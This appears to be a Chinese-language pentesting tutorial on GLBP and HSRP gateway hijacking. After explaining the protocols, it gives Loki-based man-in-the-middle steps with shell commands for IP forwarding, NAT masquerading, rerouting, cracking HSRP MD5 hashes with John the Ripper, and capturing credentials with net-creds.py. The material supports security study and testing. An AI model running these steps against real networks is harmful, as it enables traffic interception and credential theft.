GLBP & HSRP Attacks

Websec | Uw Cybersecurity Specialist

FHRP 劫持概述

FHRP 的见解

FHRP 旨在通过将多个路由器合并为一个虚拟单元来提供网络的鲁棒性，从而增强负载分配和容错能力。思科系统公司在这一套协议中引入了 GLBP 和 HSRP 等重要协议。

GLBP 协议见解

思科创建的 GLBP 在 TCP/IP 协议栈上运行，使用 UDP 在 3222 端口进行通信。GLBP 组中的路由器每 3 秒交换一次“hello”数据包。如果路由器在 10 秒内未发送这些数据包，则被认为处于离线状态。然而，这些定时器并不是固定的，可以进行修改。

GLBP 操作和负载分配

GLBP 的突出之处在于通过使用单个虚拟 IP 和多个虚拟 MAC 地址在路由器之间实现负载分配。在 GLBP 组中，每个路由器都参与数据包转发。与 HSRP/VRRP 不同，GLBP 通过多种机制提供真正的负载均衡：

• 主机依赖负载均衡： 为主机保持一致的 AVF MAC 地址分配，这对稳定的 NAT 配置至关重要。

• 轮询负载均衡： 默认方法，在请求主机之间交替分配 AVF MAC 地址。

• 加权轮询负载均衡： 根据预定义的“权重”指标分配负载。

GLBP 中的关键组件和术语

• AVG（活动虚拟网关）： 主要路由器，负责分配 MAC 地址给对等路由器。

• AVF（活动虚拟转发器）： 指定管理网络流量的路由器。

• GLBP 优先级： 决定 AVG 的指标，默认值为 100，范围在 1 到 255 之间。

• GLBP 权重： 反映路由器的当前负载，可以手动或通过对象跟踪进行调整。

• GLBP 虚拟 IP 地址： 作为所有连接设备的网络默认网关。

在交互中，GLBP 使用保留的组播地址 224.0.0.102 和 UDP 端口 3222。路由器每 3 秒发送一次“hello”数据包，如果在 10 秒内错过一个数据包，则被视为非操作状态。

GLBP 攻击机制

攻击者可以通过发送具有最高优先级值（255）的 GLBP 数据包成为主要路由器。这可能导致 DoS 或 MITM 攻击，允许流量拦截或重定向。

使用 Loki 执行 GLBP 攻击

Loki 可以通过注入优先级和权重设置为 255 的数据包来执行 GLBP 攻击。攻击前的步骤包括使用 Wireshark 等工具收集虚拟 IP 地址、身份验证存在性和路由器优先级值等信息。

攻击步骤：

1. 切换到混杂模式并启用 IP 转发。

2. 确定目标路由器并获取其 IP。

3. 生成一个 Gratuitous ARP。

4. 注入一个恶意 GLBP 数据包，冒充 AVG。

5. 为攻击者的网络接口分配一个次要 IP 地址，镜像 GLBP 虚拟 IP。

6. 实施 SNAT 以实现完整的流量可见性。

7. 调整路由以确保通过原始 AVG 路由器继续访问互联网。

通过遵循这些步骤，攻击者将自己定位为“中间人”，能够拦截和分析网络流量，包括未加密或敏感数据。

以下是所需的命令片段：

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

监控和拦截流量可以使用 net-creds.py 或类似工具来捕获和分析流经被攻陷网络的数据。

HSRP 劫持的被动解释及命令细节

HSRP（热备份路由器/冗余协议）概述

HSRP 是一种思科专有协议，旨在实现网络网关冗余。它允许将多个物理路由器配置为一个共享 IP 地址的单一逻辑单元。该逻辑单元由一个主要路由器管理，负责流量的引导。与使用优先级和权重等指标进行负载均衡的 GLBP 不同，HSRP 依赖于单个活动路由器进行流量管理。

HSRP 中的角色和术语

• HSRP 活动路由器：充当网关的设备，管理流量流动。

• HSRP 备用路由器：备用路由器，准备在活动路由器故障时接管。

• HSRP 组：一组路由器协作形成一个单一的弹性虚拟路由器。

• HSRP MAC 地址：在 HSRP 设置中分配给逻辑路由器的虚拟 MAC 地址。

• HSRP 虚拟 IP 地址：HSRP 组的虚拟 IP 地址，作为连接设备的默认网关。

HSRP 版本

HSRP 有两个版本，HSRPv1 和 HSRPv2，主要在组容量、多播 IP 使用和虚拟 MAC 地址结构上有所不同。该协议利用特定的多播 IP 地址进行服务信息交换，每 3 秒发送一次 Hello 数据包。如果在 10 秒内未收到数据包，则假定路由器处于非活动状态。

HSRP 攻击机制

HSRP 攻击涉及通过注入最大优先级值强行接管活动路由器的角色。这可能导致中间人（MITM）攻击。攻击前的关键步骤包括收集有关 HSRP 设置的数据，可以使用 Wireshark 进行流量分析。

绕过 HSRP 认证的步骤

1. 将包含 HSRP 数据的网络流量保存为 .pcap 文件。

tcpdump -w hsrp_traffic.pcap

1. 使用 hsrp2john.py 从 .pcap 文件中提取 MD5 哈希。

python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes

1. 使用 John the Ripper 破解 MD5 哈希。

john --wordlist=mywordlist.txt hsrp_hashes

使用 Loki 执行 HSRP 注入

1. 启动 Loki 以识别 HSRP 广告。

2. 将网络接口设置为混杂模式并启用 IP 转发。

sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

1. 使用 Loki 针对特定路由器，输入破解的 HSRP 密码，并执行必要的配置以冒充活动路由器。

2. 在获得活动路由器角色后，配置您的网络接口和 IP 表以拦截合法流量。

sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

1. 修改路由表以通过前活动路由器路由流量。

sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

1. 使用 net-creds.py 或类似工具从拦截的流量中捕获凭据。

sudo python2 net-creds.py -i eth0

执行这些步骤使攻击者能够拦截和操纵流量，类似于 GLBP 劫持的过程。这突显了 HSRP 等冗余协议的脆弱性以及对强大安全措施的需求。

参考文献

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Websec | Uw Cybersecurity Specialist